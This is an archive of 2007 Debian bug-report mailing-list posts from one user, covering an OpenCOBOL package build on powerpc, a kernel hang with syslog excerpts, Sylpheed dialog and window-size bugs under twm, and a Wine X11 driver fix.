 apt-get install debhelper autotools-dev libgmp3-dev libltdl3-dev libdb4.5-dev 
 libncurses5-dev autoconf cdbs
 ./debian/rules binary
 cd ..
 dpkg -i open-cobol_0.33~cvs20070616-1_powerpc.deb 

 $ cobc -v -x hello.cob
 preprocessing hello.cob into /tmp/cob12432_0.cob
 translating /tmp/cob12432_0.cob into /tmp/cob12432_0.c
 cc -pipe -c -Wall-fsigned-char -Wno-pointer-sign  -o /tmp/cob12432_0.o 
 cc -pipe  -Wl,--export-dynamic -o hello /tmp/cob12432_0.o  -L/usr/lib -lcob 
 -lm -lgmp -lncurses -ldb
 $ ./hello 
 Hello World!

It worked.  Still using same pkg versions.

Package: libcob1
Version: 0.33~cvs20070616-1

Package: libcob1-dev
Version: 0.33~cvs20070616-1

Package: libdb4.5
Version: 4.5.20-1

Package: libdb4.5-dev
Version: 4.5.20-1

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#432142: Black screen of darkness

2007-10-17 Thread Andrew Buckeridge
Package: linux-image-2.6.18-4-powerpc
Version: 2.6.18.dfsg.1-12etch2

Was running 2.6.22-2-powerpc and did not have any NAT modules loaded.

04:45:52 probably unrelated network activity
05:42:31 last heart beat -- MARK --
06:39:22 reset machine as not responding

In the morning I will have moved the mouse (USB) and/or pressed the
Shift key (PS/2).  (At application level a least the Shift key is
usually harmless.  Hope that does not crash Linux.)

Have gpm running
/usr/sbin/gpm -m /dev/input/mice -t exps2 -Rraw

X was not running.

Could it be a Pegasos OF issue like Sun and the console break or
USB/DDC/DVI power management?

As it failed to respond to ping I pressed reset.


 Oct 18 03:02:30 chrp kernel: lo: Disabled Privacy Extensions
 Oct 18 03:02:30 chrp kernel: IPv6 over IPv4 tunneling driver
 Oct 18 03:02:34 chrp kernel: eth1: no IPv6 routers present
 Oct 18 03:02:36 chrp kernel: usbcore: registered new driver usblp
 Oct 18 03:02:36 chrp kernel: drivers/usb/class/usblp.c: v0.13: USB Printer 
 Device Class driver
 Oct 18 03:02:44 chrp kernel: ip_tables: (C) 2000-2006 Netfilter Core Team
 Oct 18 03:02:50 chrp kernel: lp0: using parport0 (interrupt-driven).
 Oct 18 04:45:52 chrp kernel: IN=eth1 OUT= 
 MAC=00:0b:2f:74:9c:c1:00:18:39:a3:7a:5a:08:00 SRC= 
 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=29380 DF PROTO=TCP 
 SPT=50292 DPT=22 WINDOW=5840 RES=0x00 SYN URGP=0 
 Oct 18 06:39:22 chrp kernel: klogd 1.5.0#1, log source = /proc/kmsg started.
 Oct 18 06:39:22 chrp kernel: Using CHRP machine description
 Oct 18 06:39:22 chrp kernel: Total memory = 512MB; using 1024kB for hash 
 table (at cff0)
 Oct 18 06:39:22 chrp kernel: Linux version 2.6.18-4-powerpc (Debian 
 2.6.18.dfsg.1-12etch2) ([EMAIL PROTECTED]) (gcc version 4.1.2 20061115 
 (prerelease) (Debian 4.1.1-21)) #1 Fri May 4 01:05:19 UTC 2007
 Oct 18 06:39:22 chrp kernel: Found initrd at 0xc187:0xc1e13661


 Oct 18 03:02:44 chrp kernel: ip_tables: (C) 2000-2006 Netfilter Core Team
 Oct 18 03:02:50 chrp kernel: lp0: using parport0 (interrupt-driven).
 Oct 18 03:03:01 chrp squid[3292]: Squid Parent: child process 3294 started
 Oct 18 03:22:30 chrp -- MARK --
 Oct 18 03:42:30 chrp -- MARK --
 Oct 18 04:02:30 chrp -- MARK --
 Oct 18 04:22:30 chrp -- MARK --
 Oct 18 04:42:30 chrp -- MARK --
 Oct 18 05:02:30 chrp -- MARK --
 Oct 18 05:22:31 chrp -- MARK --
 Oct 18 05:42:31 chrp -- MARK --
 Oct 18 06:39:22 chrp kernel: klogd 1.5.0#1, log source = /proc/kmsg started.
 Oct 18 06:39:22 chrp kernel: Using CHRP machine description
 Oct 18 06:39:22 chrp kernel: Total memory = 512MB; using 1024kB for hash 
 table (at cff0)
 Oct 18 06:39:22 chrp kernel: Linux version 2.6.18-4-powerpc (Debian 
 2.6.18.dfsg.1-12etch2) ([EMAIL PROTECTED]) (gcc version 4.1.2 20061115 
 (prerelease) (Debian 4.1.1-21)) 

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#446131: When I change attachment Properties dialog is behind Compose window

2007-10-16 Thread Andrew Buckeridge
Package: sylpheed
Version: 2.4.7-1

I can reproduce this problem in Twm, Aewm, Saphire, but not Xfce4.
Sylpheed could be depending on a bug in Xfce4.

Description: RTF file

Bug#446131: When I change attachment Properties dialog is behind Compose window

2007-10-16 Thread Andrew Buckeridge
Package: sylpheed
Version: 2.4.7-1

I can reproduce this problem in Twm, Aewm, Saphire, but not Xfce4.
Sylpheed could be depending on a bug in Xfce4.

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#446131: When I change attachment Properties dialog is behind Compose window

2007-10-15 Thread Andrew Buckeridge
Package: sylpheed
Version: 2.4.7-1

On Mon, 15 Oct 2007 20:35:09 +0200
Ricardo Mones [EMAIL PROTECTED] wrote:

 On Thu, 11 Oct 2007 00:56:49 +0800
 Andrew Buckeridge [EMAIL PROTECTED] wrote:
  Package: sylpheed
  Version: 2.4.5-1
  When I attach a 7bit clean US-ASCII script it is attached as
  application/octet-stream with base64 encoding.  When I change the
  attachment Properties with a right click in twm the dialog ends up
  behind the Compose window.  I must then move the Compose window to
  change the Properties to text/plain with quoted-printable encoding.
   Can you reproduce this with latest version (2.4.7)?

Yes it is still behind.
  Ricardo Mones
  «Q: What do agnostic, insomniac dyslexics do at night? A: Stay awake 
  and wonder if there's a dog.»

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Bug#446134: Only does it some times

2007-10-15 Thread Andrew Buckeridge
Package: sylpheed
Version: 2.4.7-1

New version did not do it in Xfce4 (lenny) or Twm (lenny).
Using new libgtk2.0 and other sylpheed deps in lenny.

On Mon, 15 Oct 2007 20:37:04 +0200
Ricardo Mones [EMAIL PROTECTED] wrote:

 On Thu, 11 Oct 2007 07:03:13 +0800
 Andrew Buckeridge [EMAIL PROTECTED] wrote:
  Package: sylpheed
  Version: 2.4.5-1
  To repeat I made message list pane taller, over all window height
  remained the same, but when I stopped sylpheed and then started it
  later the window was too tall.
   I cannot reproduce this with metacity, so probably a twm bug.
Use Twm as largely procedural C, fast and light weight so I would hope
that WM bugs would be less elusive.  Has the role of WM changed in X11
and Twm has not been updated?
Don't see why my very slow environmentally responsible machine should
have to do the same thing more than once.
   Can you test with latest version and another WM and see what happens?
  Ricardo Mones
  __Q: What do agnostic, insomniac dyslexics do at night? A: Stay awake 
  and wonder if there's a dog.__

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#446131: When I change attachment Properties dialog is behind Compose window

2007-10-15 Thread Andrew Buckeridge
Package: sylpheed
Version: 2.4.7-1

This one does depend on WM.
Still have prob with Twm, but can not reproduce with Xfce4.
Which one is wrong?

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#446131: When I change attachment Properties dialog is behind Compose window

2007-10-10 Thread Andrew Buckeridge
Package: sylpheed
Version: 2.4.5-1

When I attach a 7bit clean US-ASCII script it is attached as
application/octet-stream with base64 encoding.  When I change the
attachment Properties with a right click in twm the dialog ends up
behind the Compose window.  I must then move the Compose window to
change the Properties to text/plain with quoted-printable encoding.

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#446134: window too tall when I open again

2007-10-10 Thread Andrew Buckeridge
Package: sylpheed
Version: 2.4.5-1

When I open sylpheed again the window is too tall to fit.
The width, however is the same as before.  Using twm.

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#446134: Only does it some times

2007-10-10 Thread Andrew Buckeridge
Package: sylpheed
Version: 2.4.5-1

To repeat I made message list pane taller, over all window height
remained the same, but when I stopped sylpheed and then started it
later the window was too tall.

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#404357: Need [Software\\Wine\\X11 Driver] ... ClientSideWithRender=N

2007-10-03 Thread Andrew Buckeridge
Package: wine
Version: 0.9.25-2.1

Got fix from Huw Davies of CodeWeavers.

In ~/.wine/user.reg have: -

[Software\\Wine\\X11 Driver] 1191453569

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Bug#404357: I only have this prob with remote X servers.

2007-09-28 Thread Andrew Buckeridge

Package: wine
Version: 0.9.25-2.1

 Ran test again via XDMCP and it worked.
This X server was SRSS on Solaris sparc.

 The problem only happened when I used ssh -XC.
These X servers are Etch on powerpc and sparc.

When I XDMCP from the same box I used ssh -XC on I also have the
problem.  It looks like there are some X server side deps I do not
know about.

I posted this in wine because I have never had this problem before.

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

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